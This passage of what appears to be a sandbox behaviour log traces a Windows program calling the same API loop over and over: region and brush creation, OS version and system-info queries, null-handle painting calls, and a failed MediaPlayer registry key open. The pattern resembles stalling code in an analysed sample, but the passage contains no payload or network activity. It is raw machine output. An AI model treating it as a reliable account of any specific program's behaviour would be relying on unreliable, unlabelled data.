y2=0) returned 0x1040bba [0017.656] CombineRgn (hrgnDst=0x1040bb9, hrgnSrc1=0xa104027d, hrgnSrc2=0xab040713, iMode=1) returned 1 [0017.656] CombineRgn (hrgnDst=0x1040bba, hrgnSrc1=0xa104027d, hrgnSrc2=0xab040713, iMode=4) returned 2 [0017.656] CreateSolidBrush (color=0xff) returned 0x2100bb8 [0017.656] CreateSolidBrush (color=0xff0000) returned 0x1100bbb [0017.656] DeleteObject (ho=0x1100bbb) returned 1 [0017.656] DeleteObject (ho=0xab040713) returned 1 [0017.656] DeleteObject (ho=0xa104027d) returned 1 [0017.656] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.656] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.656] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.656] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.656] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.656] BeginPath (hdc=0x0) returned 0 [0017.656] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.656] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.656] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.656] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.656] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.656] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.656] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.656] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.656] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xac040713 [0017.656] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa204027d [0017.656] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bbc [0017.656] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bbd [0017.656] CombineRgn (hrgnDst=0x1040bbc, hrgnSrc1=0xac040713, hrgnSrc2=0xa204027d, iMode=1) returned 1 [0017.656] CombineRgn (hrgnDst=0x1040bbd, hrgnSrc1=0xac040713, hrgnSrc2=0xa204027d, iMode=4) returned 2 [0017.656] CreateSolidBrush (color=0xff) returned 0x2100bbb [0017.656] CreateSolidBrush (color=0xff0000) returned 0x1100bbe [0017.656] DeleteObject (ho=0x1100bbe) returned 1 [0017.656] DeleteObject (ho=0xa204027d) returned 1 [0017.656] DeleteObject (ho=0xac040713) returned 1 [0017.656] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.656] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.657] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.657] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.657] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.657] BeginPath (hdc=0x0) returned 0 [0017.657] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.657] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.657] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.657] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.657] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.657] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.657] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.657] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.657] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa304027d [0017.657] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xad040713 [0017.657] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bbf [0017.657] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bc0 [0017.657] CombineRgn (hrgnDst=0x1040bbf, hrgnSrc1=0xa304027d, hrgnSrc2=0xad040713, iMode=1) returned 1 [0017.657] CombineRgn (hrgnDst=0x1040bc0, hrgnSrc1=0xa304027d, hrgnSrc2=0xad040713, iMode=4) returned 2 [0017.657] CreateSolidBrush (color=0xff) returned 0x2100bbe [0017.657] CreateSolidBrush (color=0xff0000) returned 0x1100bc1 [0017.657] DeleteObject (ho=0x1100bc1) returned 1 [0017.657] DeleteObject (ho=0xad040713) returned 1 [0017.657] DeleteObject (ho=0xa304027d) returned 1 [0017.657] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.657] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.657] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.657] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.657] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.657] BeginPath (hdc=0x0) returned 0 [0017.657] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.657] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.657] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.658] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.658] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.658] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.658] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.658] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.658] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xae040713 [0017.658] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa404027d [0017.658] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bc2 [0017.658] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bc3 [0017.658] CombineRgn (hrgnDst=0x1040bc2, hrgnSrc1=0xae040713, hrgnSrc2=0xa404027d, iMode=1) returned 1 [0017.658] CombineRgn (hrgnDst=0x1040bc3, hrgnSrc1=0xae040713, hrgnSrc2=0xa404027d, iMode=4) returned 2 [0017.658] CreateSolidBrush (color=0xff) returned 0x2100bc1 [0017.658] CreateSolidBrush (color=0xff0000) returned 0x1100bc4 [0017.658] DeleteObject (ho=0x1100bc4) returned 1 [0017.658] DeleteObject (ho=0xa404027d) returned 1 [0017.658] DeleteObject (ho=0xae040713) returned 1 [0017.658] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.658] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.658] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.658] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.658] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.658] BeginPath (hdc=0x0) returned 0 [0017.658] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.658] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.658] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.658] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.658] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.658] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.658] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.658] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.659] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa504027d [0017.659] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xaf040713 [0017.659] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bc5 [0017.659] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bc6 [0017.659] CombineRgn (hrgnDst=0x1040bc5, hrgnSrc1=0xa504027d, hrgnSrc2=0xaf040713, iMode=1) returned 1 [0017.659] CombineRgn (hrgnDst=0x1040bc6, hrgnSrc1=0xa504027d, hrgnSrc2=0xaf040713, iMode=4) returned 2 [0017.659] CreateSolidBrush (color=0xff) returned 0x2100bc4 [0017.659] CreateSolidBrush (color=0xff0000) returned 0x1100bc7 [0017.659] DeleteObject (ho=0x1100bc7) returned 1 [0017.659] DeleteObject (ho=0xaf040713) returned 1 [0017.659] DeleteObject (ho=0xa504027d) returned 1 [0017.659] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.659] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.659] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.659] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.659] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.659] BeginPath (hdc=0x0) returned 0 [0017.659] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.659] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.659] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.659] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.659] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.659] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.659] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.659] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.660] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb0040713 [0017.660] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa604027d [0017.660] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bc8 [0017.660] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bc9 [0017.660] CombineRgn (hrgnDst=0x1040bc8, hrgnSrc1=0xb0040713, hrgnSrc2=0xa604027d, iMode=1) returned 1 [0017.660] CombineRgn (hrgnDst=0x1040bc9, hrgnSrc1=0xb0040713, hrgnSrc2=0xa604027d, iMode=4) returned 2 [0017.660] CreateSolidBrush (color=0xff) returned 0x2100bc7 [0017.660] CreateSolidBrush (color=0xff0000) returned 0x1100bca [0017.660] DeleteObject (ho=0x1100bca) returned 1 [0017.660] DeleteObject (ho=0xa604027d) returned 1 [0017.660] DeleteObject (ho=0xb0040713) returned 1 [0017.660] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.660] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.660] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.660] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.660] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.660] BeginPath (hdc=0x0) returned 0 [0017.660] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.660] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.660] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.660] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.660] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.660] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.660] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.660] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.660] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa704027d [0017.660] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb1040713 [0017.660] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bcb [0017.661] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bcc [0017.661] CombineRgn (hrgnDst=0x1040bcb, hrgnSrc1=0xa704027d, hrgnSrc2=0xb1040713, iMode=1) returned 1 [0017.661] CombineRgn (hrgnDst=0x1040bcc, hrgnSrc1=0xa704027d, hrgnSrc2=0xb1040713, iMode=4) returned 2 [0017.661] CreateSolidBrush (color=0xff) returned 0x2100bca [0017.661] CreateSolidBrush (color=0xff0000) returned 0x1100bcd [0017.661] DeleteObject (ho=0x1100bcd) returned 1 [0017.661] DeleteObject (ho=0xb1040713) returned 1 [0017.661] DeleteObject (ho=0xa704027d) returned 1 [0017.661] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.661] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.661] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.661] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.661] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.661] BeginPath (hdc=0x0) returned 0 [0017.661] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.661] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.661] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.661] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.661] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.661] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.661] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.661] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.661] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb2040713 [0017.661] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa804027d [0017.661] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bce [0017.661] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bcf [0017.661] CombineRgn (hrgnDst=0x1040bce, hrgnSrc1=0xb2040713, hrgnSrc2=0xa804027d, iMode=1) returned 1 [0017.661] CombineRgn (hrgnDst=0x1040bcf, hrgnSrc1=0xb2040713, hrgnSrc2=0xa804027d, iMode=4) returned 2 [0017.661] CreateSolidBrush (color=0xff) returned 0x2100bcd [0017.661] CreateSolidBrush (color=0xff0000) returned 0x1100bd0 [0017.662] DeleteObject (ho=0x1100bd0) returned 1 [0017.662] DeleteObject (ho=0xa804027d) returned 1 [0017.662] DeleteObject (ho=0xb2040713) returned 1 [0017.662] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.662] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.662] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.662] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.662] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.662] BeginPath (hdc=0x0) returned 0 [0017.662] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.662] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.662] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.662] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.662] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.662] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.662] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.662] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.662] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa904027d [0017.662] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb3040713 [0017.662] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bd1 [0017.662] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bd2 [0017.662] CombineRgn (hrgnDst=0x1040bd1, hrgnSrc1=0xa904027d, hrgnSrc2=0xb3040713, iMode=1) returned 1 [0017.662] CombineRgn (hrgnDst=0x1040bd2, hrgnSrc1=0xa904027d, hrgnSrc2=0xb3040713, iMode=4) returned 2 [0017.662] CreateSolidBrush (color=0xff) returned 0x2100bd0 [0017.662] CreateSolidBrush (color=0xff0000) returned 0x1100bd3 [0017.662] DeleteObject (ho=0x1100bd3) returned 1 [0017.662] DeleteObject (ho=0xb3040713) returned 1 [0017.662] DeleteObject (ho=0xa904027d) returned 1 [0017.662] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.662] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.663] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.663] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.663] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.663] BeginPath (hdc=0x0) returned 0 [0017.663] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.663] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.663] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.663] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.663] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.663] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.663] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.663] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.663] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb4040713 [0017.663] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xaa04027d [0017.663] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bd4 [0017.663] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bd5 [0017.663] CombineRgn (hrgnDst=0x1040bd4, hrgnSrc1=0xb4040713, hrgnSrc2=0xaa04027d, iMode=1) returned 1 [0017.663] CombineRgn (hrgnDst=0x1040bd5, hrgnSrc1=0xb4040713, hrgnSrc2=0xaa04027d, iMode=4) returned 2 [0017.663] CreateSolidBrush (color=0xff) returned 0x2100bd3 [0017.663] CreateSolidBrush (color=0xff0000) returned 0x1100bd6 [0017.663] DeleteObject (ho=0x1100bd6) returned 1 [0017.663] DeleteObject (ho=0xaa04027d) returned 1 [0017.663] DeleteObject (ho=0xb4040713) returned 1 [0017.663] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.663] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: 